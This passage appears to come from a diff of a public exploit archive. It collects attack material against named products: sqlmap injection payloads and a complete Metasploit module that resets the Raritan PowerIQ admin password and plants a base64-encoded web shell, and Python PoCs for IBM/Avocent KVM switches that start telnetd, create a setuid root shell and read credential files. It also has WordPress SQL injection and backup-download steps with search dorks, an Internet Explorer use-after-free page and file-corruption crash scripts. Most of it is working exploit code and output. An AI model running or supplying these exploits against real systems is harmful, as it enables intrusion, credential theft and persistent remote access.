Payload: sort=id,(SELECT (CASE WHEN (6357=6357) THEN 1 ELSE 1/(SELECT
0) END))&dir=ASC
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: sort=id; SELECT PG_SLEEP(5)--&dir=ASC
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 time-based blind - Parameter replace
Payload: sort=(SELECT 5480 FROM PG_SLEEP(5))&dir=ASC
Place: POST
Parameter: dir
Type: boolean-based blind
Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses
Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (5274=5274) THEN 1 ELSE
1/(SELECT 0) END))
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: sort=id&dir=ASC; SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (1501=1501) THEN (SELECT
1501 FROM PG_SLEEP(5)) ELSE 1/(SELECT 0) END))
---
There may also be a remote command execution vulnerability available to
administrators (or you if you use the stacked injection to update the
hashes).
When saving an NTP server, you can inject a newline (%0a) into the request
in order to save a malformed 'server' stanza in the ntp.conf. When syncing
with NTP, the application passes the first NTP server to the NTP utility
via bash. I was not able to make my malformed NTP server available as the
first in the list, thus was not able to achieve RCE. There may be a way to
do it though that I am unaware of.
Attached is a Metasploit module that I began writing when attempting to
achieve RCE but was never able to. This module will
A) Pull out the current password hash and salt for the 'admin' user and
cache them.
B) Update the admin creeds to be 'admin:Passw0rd!'
C) Set up the malformed NTP server
D) Attempt to sync with NTP.
Because I was not able to achieve RCE via that vector, this module does not
actually pop a shell, so I am sorry about that.
Maybe some PostgreSQL UDF fanciness will be the key.
You may also find the module available here:
https://gist.github.com/brandonprry/01bcd9ec7b8a78ccfc42
Quick module run:
bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
+ -- --=[ 1292 exploits - 702 auxiliary - 202 post ]
+ -- --=[ 332 payloads - 33 encoders - 8 nops ]
msf > use exploit/linux/http/raritan_poweriq_sqli
msf exploit(raritan_poweriq_sqli) > set RHOST 192.168.1.25
RHOST => 192.168.1.25
msf exploit(raritan_poweriq_sqli) > check
[*] Attempting to get banner... This could take several minutes to
fingerprint depending on network speed.
[*] Looks like the length of the banner is: 107
[+] Looks like you are vulnerable.
[+] 192.168.1.25:443 - The target is vulnerable.
msf exploit(raritan_poweriq_sqli) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Checking if vulnerable before attempting exploit.
[*] Attempting to get banner... This could take several minutes to
fingerprint depending on network speed.
[*] Looks like the length of the banner is: 107
[+] Looks like you are vulnerable.
[*] We are vulnerable. Exploiting.
[*] Caching current admin user's password hash and salt.
[*] I can set it back later and they will be none the wiser
[*] Grabbing current hash
[*] Old hash: 84c420e40496930e27301b10930e5966638e0b21
[*] Grabbing current salt
[*] Old salt: 8f3cceddf302b3e2465d6e856e8818c6217d4d04
[*] Resetting admin user credentials to admin:Passw0rd!
[*] Authenticating with admin:Passw0rd!
[*] Setting some stuff up
[*] Sending stager
[*] Triggering stager
[*] Exploit completed, but no session was created.
msf exploit(raritan_poweriq_sqli) >
-- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website
=end
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Raritan PowerIQ Unauthenticated SQL Injection",
'Description' => %q{
This module will exploit an unauthenticated SQL injection in order to gain
a shell on the remote victim. This was tested against PowerIQ v4.1.0.
The 'check' command will attempt to pull the banner of the DBMS (PGSQL) in
order to verify exploitability via boolean injections.
In order to gain remote command execution, multiple vulnerabilities are used.
I use a SQL injection to gain administrative access.
I use a newline injection to save an NTP server I shouldn't be able to save.
By saving this unsanitized NTP server, I can execute commands as 'nginx' with
a request to the server's web application.
You can find a trial ISO at the following link. CentOS-based with PGSQL.
This is what this module was tested against.
http://cdn.raritan.com/download/power-iq/v4.1.0/power-iq-v4.1.0.73.iso
Trial license:
http://d3b2us605ptvk2.cloudfront.net/download/power-iq/RAR_PWIQ5FL_W7rYAAT_13JAN10_1206.lic
If for some reason these links do not work, I "registered" for the trial here:
https://www1.raritan.com/poweriqdownload.html
},
'License' => MSF_LICENSE,
'Author' =>
[
],
'References' =>
[
],
'DefaultOptions' =>
{
'SSL' => true,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "\x20",
'Compat' =>
{
'RequiredCmd' => 'generic perl python',
}
},
'Targets' =>
[
['Raritan PowerIQ v4.1.0', {}]
],
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
], self.class)
end
#In order to check for exploitability, I will enumerate the banner
#of the DBMS until I have it match a regular expression of /postgresql/i
#
#This isn't optimal (takes a few minutes), but it is reliable. I use
#a boolean injection to enumerate the banner a byte at a time.
def check
#First we make a request that we know should return a 200
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'data' => 'sort=id&dir=ASC'
})
if !res or res.code != 200
return Exploit::CheckCode::Safe
end
#Now we make a request that we know should return a 500
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'data' => "sort=id'&dir=ASC"
})
if !res or res.code != 500
print_error("Probably not vulnerable.")
return Exploit::CheckCode::Safe
end
#If we have made it this far, we believe we are exploitable,
#but now we must prove it. Get the length of the banner before
#attempting to enumerate the banner. I assume the length
#is not greater than 999 characters.
print_status("Attempting to get banner... This could take several minutes to fingerprint depending on network speed.")
length = ''
(1..3).each do |l|
(47..57).each do |i|
str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(LENGTH(VERSION()) AS CHARACTER(10000)),(CHR(32))))::text FROM #{l} FOR 1))>#{i}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'data' => str
})
if res and res.code == 500
length << i.chr
break
end
end
end
if length == ''
return Exploit::CheckCode::Safe
end
print_status("Looks like the length of the banner is: " + length)
#We have the length, now let's get the banner until it matches
#the regular expression /postgresql/i
banner = ''
(1..length.to_i).each do |c|
(32..126).each do |b|
str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32))))::text FROM #{c} FOR 1))>#{b}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest',
},
'data' => str
})
if res and res.code == 500
banner << b.chr
if c%10 == 0
vprint_status("#{((c.to_f/length.to_f)*100).to_s}% done: " + banner)
end
if banner =~ /postgresql/i
print_good("Looks like you are vulnerable.")
vprint_good("Current banner: " + banner)
return Exploit::CheckCode::Vulnerable
end
break
end
end
end
#If we reach here, we never matched our regex, which means we must
#not be vulnerable.
return Exploit::CheckCode::Safe
end
def exploit
print_status("Checking if vulnerable before attempting exploit.")
if check == Exploit::CheckCode::Vulnerable
print_status("We are vulnerable. Exploiting.")
print_status("Caching current admin user's password hash and salt.")
print_status("I can set it back later and they will be none the wiser")
print_status("Grabbing current hash")
old_crypted_password = get_admin_column_value("crypted_password")
print_status("Old hash: " + old_crypted_password)
print_status("Grabbing current salt")
old_salt = get_admin_column_value("salt")
print_status("Old salt: " + old_salt)
print_status("Resetting admin user credentials to admin:Passw0rd!")
headers = {
'X-Requested-With' => 'XMLHttpRequest'
}
salt_inj = ';UPDATE users set salt = (CHR(56)||CHR(102)||CHR(51)||CHR(99)||CHR(99)||CHR(101)||CHR(100)||CHR(100)||CHR(102)||CHR(51)||CHR(48)||CHR(50)||CHR(98)||CHR(51)||CHR(101)||CHR(50)||CHR(52)||CHR(54)||CHR(53)||CHR(100)||CHR(54)||CHR(101)||CHR(56)||CHR(53)||CHR(54)||CHR(101)||CHR(56)||CHR(56)||CHR(49)||CHR(56)||CHR(99)||CHR(54)||CHR(50)||CHR(49)||CHR(55)||CHR(100)||CHR(52)||CHR(100)||CHR(48)||CHR(52)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--'
hash_inj = ';UPDATE users set crypted_password=(CHR(56)||CHR(52)||CHR(99)||CHR(52)||CHR(50)||CHR(48)||CHR(101)||CHR(52)||CHR(48)||CHR(52)||CHR(57)||CHR(54)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(50)||CHR(55)||CHR(51)||CHR(48)||CHR(49)||CHR(98)||CHR(49)||CHR(48)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(53)||CHR(57)||CHR(54)||CHR(54)||CHR(54)||CHR(51)||CHR(56)||CHR(101)||CHR(48)||CHR(98)||CHR(50)||CHR(49)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--'
post = {
'sort' => 'id' + salt_inj,
'dir' => 'ASC'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => headers,
'vars_post' => post
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way")
end
post['sort'] = 'id' + hash_inj
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => headers,
'vars_post' => post
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way")
end
print_status("Authenticating with admin:Passw0rd!")
post = {
'login' => 'admin',
'password' => 'Passw0rd!'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login', 'login'),
'method' => 'POST',
'vars_post' => post
})
if !res or res.code != 302
fail_with("Authentication failed.")
end
cookie = res.get_cookies
print_status("Setting some stuff up")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers.json'),
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
servers = JSON.parse(res.body)
post = {
'_method' => '_delete',
'hosts' => servers["servers"].to_json
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'),
'method' => 'DELETE',
'vars_post' => post,
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
print_status("Sending stager")
stage = '`echo${IFS}Ye2xhc3MgRmRzYUNvbnRyb2xsZXIgPCBBY3Rpb25Db250cm9sbGVyOjpCYXNlCiAgZGVmIGluZGV4'
stage << 'CiAgICByZXQgPSBgI3twYXJhbXNbOmNtZF19YAogICAgcmVkaXJlY3RfdG8gcmV0CiAgZW5kCmVu'
stage << 'ZCAKIAoK|base64${IFS}--decode>/opt/raritan/polaris/rails/main/app/controllers/rewq_controller.rb`'
post = {
'host[server]' => "www.abc.com\x0aserver " + stage,
'host[ip_type]' => '0'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers'),
'method' => 'POST',
'vars_post' => post,
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200 or res.body =~ /false/
fail_with("Server did not respond in an expected way.")
end
post = {
'_method' => '_delete',
'hosts' => '[{"server":"www.abc.com", "ip_type":0}]'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'),
'method' => 'DELETE',
'vars_post' => post,
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'application_settings', 'edit'),
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
res.body =~ /boxLabel: "Enable NTP",\n checked: (true|false),\n listeners/m
checked = $1
if checked == "true"
post = {
'_method' => 'put',
'rails_options[time_zone]' => 'UTC',
'date_time' => '',
'rails_options[ntp_enabled]' => 'off'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})
if !res or res.code != 302
fail_with("Server did not respond in an expected way")
end
end
post = {
'_method' => 'put',
'rails_options[time_zone]' => 'UTC',
'date_time' => '',
'rails_options[ntp_enabled]' => 'on'
}
print_status("Triggering stager")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie,
})
end
end
def get_admin_column_value(column)
ret = ''
(1..40).each do |i|
[*('0'..'9'),*('a'..'f')].each do |c|
inj = "(SELECT (CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(#{column} AS CHARACTER(10000)),(CHR(32))) FROM users WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)) OFFSET 0 LIMIT 1)::text FROM #{i} FOR 1))>#{c.ord}) THEN 1 ELSE 1/(SELECT 0) END))"
post = {
'sort' => 'id,' + inj,
'dir' => 'ASC'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => post
})
if !res
fail_with("Server did not respond in an expected way")
end
if res.code == 500
vprint_status("Got character '"+c+"' for index " + i.to_s)
ret << c
break
end
end
end
return ret
end
end

128
platforms/php/remote/34132.txt Executable file
View file

@ -0,0 +1,128 @@
*Product description*
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1.20.0.22575 and prior are
vulnerables.
Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
*1. Remote code execution *
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
#!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
import os
sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%
206755%20/tmp/su%20;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
print "[*] Sending GET to " + target + " with session id " + sessid
+ "..."
c.perform()
c.close()
except:
print ""
finally:
print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password
\"root\""
os.system("telnet " + target)
*2. Arbitrary file read *
CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.
PoC of this vulnerability:
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_
bits&display=results&filename=" + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
c.perform()
c.close()
except:
print ""
content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")
*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input. A remote attacker could exploit
this vulnerability using a specially-crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials.
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
*Vendor Response:*
IBM release 1.20.20.23447 firmware
*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed
*External Information:*
Info about the vulnerability (spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

52
platforms/php/webapps/34105.txt Executable file
View file

@ -0,0 +1,52 @@
######################
# Exploit Title : Wordpress Gallery Objects 0.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://galleryobjects.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
# Dork Google: inurl:/admin-ajax.php?action=go_view_object
# Date : 2014-07-18
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
Poc via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
#####################

25
platforms/php/webapps/34124.txt Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
# Google Dork: Index of:"/wp-backup-plus"
# Date: 19/07/2014
# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
# Vendor Homepage: http://wpbackupplus.com/
# Version:
# Tested on: win7 32 Bit & Linux Kali
[+] Description
wpbackupplus make the backup .zip files and not protected
[+] Exploit:
For download all the website files
http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/
For download the Database backup
http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp
[+] POC :
http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/

113
platforms/win32/dos/34010.html Executable file
View file

@ -0,0 +1,113 @@
<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>
<body>
<form id="form1">
<input id="input1" type="text" value="">
</form>
<script>
loaded = false ;
function func() {
if (loaded) {
document.body.innerHTML = "" ; // free CFormElement
}
}
input1 = document.getElementById("input1") ;
input1.onclick = func ;
loaded = true ;
input1.click(); // Call DoClick function
</script>
</body>
</html>
<!--
Vulnerability details
MSHTML!CInput::DoClick
66943670 8bcf mov ecx,edi
66943672 ff751c push dword ptr [ebp+1Ch]
66943675 ff7518 push dword ptr [ebp+18h]
66943678 ff7514 push dword ptr [ebp+14h]
6694367b ff7510 push dword ptr [ebp+10h]
6694367e ff750c push dword ptr [ebp+0Ch]
66943681 ff7508 push dword ptr [ebp+8] <---- esi = CFormElement
66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85db test ebx,ebx
6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe and dword ptr [esi+68h],0FFFFFFFEh ; memory corruption, write to freed memory
MSHTML!CInput::DoClick+0x60:
66943681 ff7508 push dword ptr [ebp+8] ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20 6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
0034cd18 0034cd20 00270000 002fcee8 78 - c LFH;busy
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db test ebx,ebx
0:005> dds esi l1
0034cd20 6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
0034cd18 0034cd20 00270000 002fcee8 78 - 0 LFH;free
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695) [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001
-->

55
platforms/windows/dos/34129.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)
# Date: 21 Jul 2014
# Exploit Author: Alireza Chegini (@nimaarek)
# Vendor Homepage: http://us.battle.net/wow/
# Version: 3.3.5a
# Tested on: Win7
Output:
--WoWError [CrashDUmp] :
World of WarCraft (build 12340)
Exe: D:\Wow\Wow.exe
Time: Jul 21, 2014 6:10:08.243 PM
User: nimaarek
Computer: NIMAAREK-L
------------------------------------------------------------------------------
This application has encountered a critical error:
ERROR #132 (0x85100084) Fatal Exception
Program: D:\Wow\Wow.exe
Exception: 0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77
--Windbg result:
0:020> g
ModLoad: 6c670000 6c6a0000 C:\Windows\SysWOW64\wdmaud.drv
ModLoad: 6d3a0000 6d3a4000 C:\Windows\SysWOW64\ksuser.dll
ModLoad: 6c660000 6c667000 C:\Windows\SysWOW64\AVRT.dll
ModLoad: 6c610000 6c618000 C:\Windows\SysWOW64\msacm32.drv
ModLoad: 6c600000 6c607000 C:\Windows\SysWOW64\midimap.dll
ModLoad: 71e50000 71e66000 C:\Windows\SysWOW64\CRYPTSP.dll
ModLoad: 71e10000 71e4b000 C:\Windows\SysWOW64\rsaenh.dll
(3a8.470): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Wow.exe -
eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000
eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Wow+0xbb77:
0040bb77 8500 test dword ptr [eax],eax ds:002b:02af2000=00000000
==============================================================================
Poc :
%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt
MACRO 1 "Decursive" INV_Misc_QuestionMark
/stopcasting
/cast [target=mouseover,nomod,exists] Dispel Magic; [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic
END
MACRO 2 "PoC" INV_Misc_QuestionMark
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-)
END
==============================================================================
Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]

122
platforms/windows/dos/34135.py Executable file
View file

@ -0,0 +1,122 @@
from shutil import copyfile
import sys
"""
Exploit Title: DjVuLibre <= 3.5.25 Out of Bounds Access Violation
Date: 07/14/24
Exploit Author: drone (@dronesec)
Vendor: http://djvu.sourceforge.net/
Software link: http://downloads.sourceforge.net/djvu/djvulibre-3.5.25.3.tar.gz
Version: <= 3.5.25.3
Tested On: WinXP/Win7
Patch: https://sourceforge.net/p/djvu/djvulibre-git/ci/7993b445f071a15248bd4be788a10643213cb9d2/
The crash occurs due to a out of bounds read
.text:004D3BC0 mov ecx, edx
.text:004D3BC2 and ecx, 0Fh
=> .text:004D3BC5 mov eax, [eax+ecx*4]
.text:004D3BC8 test eax, eax
.text:004D3BCA jnz short loc_
We overwrite 4 bytes in an FG44 chunk header with \xff\xff\xff\xff:
46 47
34 34 00 00 04 6E 00 64 01 02 FF FF FF FF 80 FF <=
F2 D9 81 5E 5C 51 12 AD 6B 27 14 29 F6 53 2B DD
79 B0 01 E3 E2 71 33 58 CA 23 AE 25 35 E8 FF FF
FF FF F5 BA 7A FA 45 39 C7 CD E0 76 93 FF FF FF
FF FF F4 F1 85 98 84 DF 58 71 FE 2A 5F FF B7 16
31 67 4E 93 F0 2D 20 D5 58 22 39 02 26 7E A6 03
The crash occurs during image parsing:
// Allocate reconstruction buffer
short *data16;
GPBuffer<short> gdata16(data16,bw*bh);
// Copy coefficients
int i;
short *p = data16;
const IW44Image::Block *block = blocks;
for (i=0; i<bh; i+=32)
{
for (int j=0; j<bw; j+=32)
{
short liftblock[1024];
// transfer into IW44Image::Block (apply zigzag and scaling)
block->write_liftblock(liftblock);
[...]
void
IW44Image::Block::write_liftblock(short *coeff, int bmin, int bmax) const
{
int n = bmin<<4;
memset(coeff, 0, 1024*sizeof(short));
for (int n1=bmin; n1<bmax; n1++)
{
const short *d = data(n1);
[....]
inline const short*
IW44Image::Block::data(int n) const
{
if (! pdata[n>>4])
return 0;
return pdata[n>>4][n&15];
}
Which lines up quite nicely with our inlined disassembly of the function:
.text:004D3BB0 loc_4D3BB0:
.text:004D3BB0 mov ecx, [esp+0Ch+arg_0]
.text:004D3BB4 mov eax, edx
.text:004D3BB6 sar eax, 4 ; [n>>4]
.text:004D3BB9 mov eax, [ecx+eax*4] ; our pdata[n] data after the bitwise shift, lets call it n2
.text:004D3BBC test eax, eax ; if(n2 == 0)
.text:004D3BBE jz short loc_4 ; return 0
.text:004D3BC0 mov ecx, edx
.text:004D3BC2 and ecx, 0Fh ; apply n & 15, or pdata[n2][n&15], lets call it n3
=> .text:004D3BC5 mov eax, [eax+ecx*4] ; dereference pdata[n2][n3] into d
.text:004D3BC8 test eax, eax ; test if d == 0
.text:004D3BCA jnz short loc_
n2 refs to a location on the heap; may be exploitable if we stack Fg44 chunks with valid headers and malformed content, so the chunk
is allocated, then free'd, and hopefully our pointer dips into one of those free'd chunks. The returned short pointer is then used as the source in a
memcpy with a controllable destination; write-what-where. Who knows.
Tested with SumatraPDF 2.5.2 and WinDjView 2.0.2
"""
if len(sys.argv) < 2:
print '[%s] <djvu file>' % sys.argv[0]
sys.exit(1)
bfile = sys.argv[1]
# read in the data for parsing
base_data = None
with open(bfile, "rb") as f:
base_data = f.read()
# find a valid chunk
chunk_idx = base_data.find("\x46\x47\x34\x34")
if chunk_idx == -1:
print '[-] No valid FG44 chunks found'
sys.exit(1)
copyfile(bfile, "./%s-dos.djvu" % bfile)
print '[!] Found FG44 chunk at offset %d' % chunk_idx
# overwrite
with open("./%s-dos.djvu" % bfile, "r+b") as base:
# skip over 4 byte indicator (FG44)
# 2 byte primary header
# 2 byte secondary header
# 4 byte tertiary header
base.seek(chunk_idx+12)
base.write("\xff\xff\xff\xff")
print '[!] %s-dos.djvu generated' % bfile

206
platforms/windows/local/34112.txt Executable file
View file

@ -0,0 +1,206 @@
